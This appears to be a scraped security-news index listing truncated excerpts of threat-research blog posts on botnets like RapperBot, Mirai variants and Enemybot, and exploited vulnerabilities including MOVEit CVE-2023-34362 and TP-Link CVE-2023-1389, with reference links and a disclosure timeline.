Condi Botnet: Buy or Rent
While pi
Fortinet
MOVEit Transfer Critical Vulnerability (CVE-2023-34362) Exploited as a 0-day | FortiGuard Labs
blogs_fortinet·2023-06-08·CVSS 9.8
CVE-2023-34362 [CRITICAL] MOVEit Transfer Critical Vulnerability (CVE-2023-34362) Exploited as a 0-day | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
MOVEit Transfer Critical Vulnerability (CVE-2023-34362) Exploited as a 0-day
By James Slaughter, Fred Gutierrez, and Shunichi Imano | June 08, 2023
Affected Platforms: All unpatched MOVEit Transfer versions running a SQL database
Impacted Users: Any organization that uses a vulnerable version of MOVEit Transfer
Impact: Remote attackers can install a backdoor and exfiltrate data
Severity Level: High
FortiGuard Labs is aware of a critical zero-day SQL injection vulnerability in the MOVEit Secure Managed File Transfer software (CVE-2023-34362) allegedly exploited by the Cl0p ransomware threat actor. High-profile government, finance, media, aviation, and healthcare organizations have reportedly been affected, with data exfiltrated and stolen.
Due to its seve
Fortinet
RapperBot DDoS Botnet Expands into Cryptojacking | FortiGuard Labs
blogs_fortinet·2023-05-09
RapperBot DDoS Botnet Expands into Cryptojacking | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
RapperBot DDoS Botnet Expands into Cryptojacking
By Joie Salvio and Roy Tay | May 09, 2023
Affected Platforms: Linux
Impacted Users: Any organization
Impact: Remote attackers gain control of the vulnerable systems
Severity Level: Critical
FortiGuard Labs has encountered new samples of the RapperBot campaign active since January 2023. RapperBot is a malware family primarily targeting IoT devices. It has been observed in the wild since June 2022. FortiGuard Labs reported on its previous campaigns in August 2022 and December 2022. Those campaigns focused on brute-forcing devices with weak or default SSH or Telnet credentials to expand the botnet’s footprint for launching Distributed Denial of Service (DDoS) attacks.
In this campaign, these threat actors hav
Trendmicro
TP-Link WAN-side Vulnerability CVE-2023-1389 Added to the Mirai Botnet Arsenal
blogs_trendmicro·2023-04-24·CVSS 8.8
CVE-2023-1389 [HIGH] TP-Link WAN-side Vulnerability CVE-2023-1389 Added to the Mirai Botnet Arsenal
# TP-Link WAN-side Vulnerability CVE-2023-1389 Added to the Mirai Botnet Arsenal
Learn about exploit attempts coming from the telemetry system in Eastern Europe
By: Peter Girnus
2023/04/24
Last week, the Zero Day Initiative (ZDI) threat-hunting team observed new exploit attempts coming from our telemetry system in Eastern Europe indicating that the Mirai botnet has updated its arsenal to include CVE-2023-1389, also known as ZDI-CAN-19557/ZDI-23-451. This bug in the TP-Link Archer AX21 Wi-Fi router was originally disclosed to ZDI during the Pwn2Own Toronto event, where it was used by Team Viettel in their LAN-side entry against the TP-Link device and by Qrious Security in their WAN-side entry.
Both teams’ entries were successful at the contest, and th
Fortinet
New RapperBot Campaign – We Know What You Bruting for this Time | FortiGuard Labs
blogs_fortinet·2022-11-16
New RapperBot Campaign – We Know What You Bruting for this Time | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
New RapperBot Campaign – We Know What You Bruting for this Time
By Joie Salvio and Roy Tay | November 16, 2022
After FortiGuard Labs reported on RapperBot in our previous article titled So RapperBot, What Ya Bruting For? in August 2022, there was a significant drop in the number of samples collected in the wild. But in early October 2022, new samples with the same distinctive C2 protocol used by RapperBot were detected.
Unlike the murky objectives of the previous campaign, it is quickly evident that these samples are part of a separate campaign to launch Distributed Denial of Service (DDoS) attacks against game servers, which we believe to be a re-emergence of a similar campaign from earlier this year.
Affected Platforms: Linux
Impacted Users: Any organ
Fortinet
Enemybot: A Look into Keksec's Latest DDoS Botnet | FortiGuard Labs
blogs_fortinet·2022-04-12
Enemybot: A Look into Keksec's Latest DDoS Botnet | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
Enemybot: A Look into Keksec's Latest DDoS Botnet
By Joie Salvio and Roy Tay | April 12, 2022
In mid-March, FortiGuard Labs observed a new DDoS botnet calling itself “Enemybot” and attributing itself to Keksec, a threat group that specializes in cryptomining and DDoS attacks.
This botnet is mainly derived from Gafgyt’s source code but has been observed to borrow several modules from Mirai’s original source code.
It uses several methods of obfuscation for its strings to hinder analysis and hide itself from other botnets. Furthermore, it connects to a command-and-control (C2) server that is hidden in the Tor network, making its takedown more complicated.
Enemybot has been seen targeting routers from Seowon Intech and D-Link, and exploits a recently reported
Fortinet
MANGA aka Dark Mirai-based Campaign Targets New TP-Link Router RCE Vulnerability | FortiGuard Labs
blogs_fortinet·2021-12-08
MANGA aka Dark Mirai-based Campaign Targets New TP-Link Router RCE Vulnerability | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
MANGA aka Dark Mirai-based Campaign Targets New TP-Link Router RCE Vulnerability
By Joie Salvio | December 08, 2021
Last week, our FortiGuard Labs team encountered a malware sample that is currently being distributed in the wild targeting TP-Link wireless routers. It leverages a post-authentication RCE vulnerability that was released barely two weeks prior.
As it turns out, it is an updated variant of the MANGA campaign (also known as Dark) that distributes samples based on Mirai's published source code. This Mirai-based Distributed Denial of Service (DDoS) botnet campaign is one that FortiGuard Labs has been actively monitoring. The campaign originally piqued our interest due to the continuous updating of its list of target vulnerabilities, more so than ot
Fortinet
Mirai-based Botnet - Moobot Targets Hikvision Vulnerability | FortiGuard Labs
blogs_fortinet·2021-12-06·CVSS 9.8
CVE-2021-36260 [CRITICAL] Mirai-based Botnet - Moobot Targets Hikvision Vulnerability | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
Mirai-based Botnet - Moobot Targets Hikvision Vulnerability
By Cara Lin | December 06, 2021
Last September 18th, a threat researcher released a write-up about a remote code execution vulnerability that affects various products from Hikvision, one of the largest video surveillance brands in the world. Hikvision is a CVE CNA and quickly assigned the CVE number, CVE-2021-36260, and released a patch for the vulnerability on the same day as the threat researcher's disclosure. Shortly after, FortiGuard Labs developed an IPS signature to address it.
During our analysis, we observed numerous payloads attempting to leverage this vulnerability to probe the status of devices or extract sensitive data from victims. One payload in particular caught our attention.
Fortinet
DDoS-for-Hire Service Powered by Bushido Botnet
blogs_fortinet·2018-10-26
DDoS-for-Hire Service Powered by Bushido Botnet
FORTIGUARD LABS THREAT RESEARCH
DDoS-for-Hire Service Powered by Bushido Botnet
By Rommel Joven and Evgeny Ananin | October 26, 2018
Distributed Denial-of-Service (DDoS) service offerings, often disguised as legitimate “booter” or “stresser” services, continue to increase in the cyber underground market. This relatively new Crime-as-a-Service trend has created an entry point for novice DDoS attackers, offering a simple option to anonymously attack nearly any website and forcing it offline for a small fee.
Sadly, due to the public release of the source code of some popular bots, building a botnet to provide these services is simpler than ever. A quick Google search returns lists of resources for botnet builders, usually with complete step-by-step instructions. Being able to re-use and ev
Fortinet
Cybercriminals Exploiting Microsoft’s Vulnerable Dynamic Data Exchange Protocol
blogs_fortinet·2017-11-17·CVSS 8.8
[HIGH] Cybercriminals Exploiting Microsoft’s Vulnerable Dynamic Data Exchange Protocol
FORTIGUARD LABS THREAT RESEARCH
Cybercriminals Exploiting Microsoft’s Vulnerable Dynamic Data Exchange Protocol
By FortiGuard SE Team | November 17, 2017
Visa Payment Systems Intelligence recently announced that cybercriminals are threatening the payments ecosystem by leveraging a vulnerable Microsoft Dynamic Data Exchange protocol in phishing campaigns. This phishing attack relies on the Dynamic Data Exchange (DDE) protocol for infection instead of the usual malicious macros or an exploit kit.
This exploit is related to the Microsoft Security Advisory 4053440 issued on November 8, 2017. It provides guidance on securing Microsoft applications when processing Dynamic Data Exchange (DDE) fields. The DDE protocol enables messages to be sent between Microsoft applications and uses shared da
Greynoiseio
NoiseLetter
blogs_greynoiseio
NoiseLetter
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
Greynoiseio
Trinity Cyber + GreyNoise: Sharing Intelligence to Protect Internet Citizens
blogs_greynoiseio·CVSS 8.8
[HIGH] Trinity Cyber + GreyNoise: Sharing Intelligence to Protect Internet Citizens
Greynoiseio
GreyNoise Round Up: Product Updates
blogs_greynoiseio
GreyNoise Round Up: Product Updates
Greynoiseio
At The Edge Clear: March 16-23, 2026
blogs_greynoiseio
At The Edge Clear: March 16-23, 2026
Greynoiseio
GreyNoise Round Up: Product Updates
blogs_greynoiseio
GreyNoise Round Up: Product Updates
Greynoiseio
Storm Watch
blogs_greynoiseio
Storm Watch
Greynoiseio
NoiseLetter April 2025
blogs_greynoiseio
NoiseLetter April 2025
Greynoiseio
GreyNoise and TrinityCyber have observed active exploitation attempts using weaknesses found in CVE-2023-1389 against TP-Link Archer gigabit routers. The blog post provides information about a new Gre
blogs_greynoiseio·CVSS 8.8
[HIGH] GreyNoise and TrinityCyber have observed active exploitation attempts using weaknesses found in CVE-2023-1389 against TP-Link Archer gigabit routers. The blog post provides information about a new Gre
Greynoiseio
The Eleventh Day Of Tagsmas (2023): A Critical Vulnerability in TP-Link Routers (CVE-2023-1389)
blogs_greynoiseio·CVSS 8.8
[HIGH] The Eleventh Day Of Tagsmas (2023): A Critical Vulnerability in TP-Link Routers (CVE-2023-1389)
Greynoiseio
- blogs_greynoiseio: NoiseLetter
- [CRITICAL] blogs_greynoiseio · CVSS 9.0: KEV'd: CVE-2021-45046, CVE-2023-21839, and CVE-2023-1389
References
- http://packetstormsecurity.com/files/174131/TP-Link-Archer-AX21-Command-Injection.html
- https://www.tenable.com/security/research/tra-2023-11
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2023-1389
Timeline
- 2023-03-15: Published
- 2023-05-01: Added to CISA KEV
- Exploited in the wild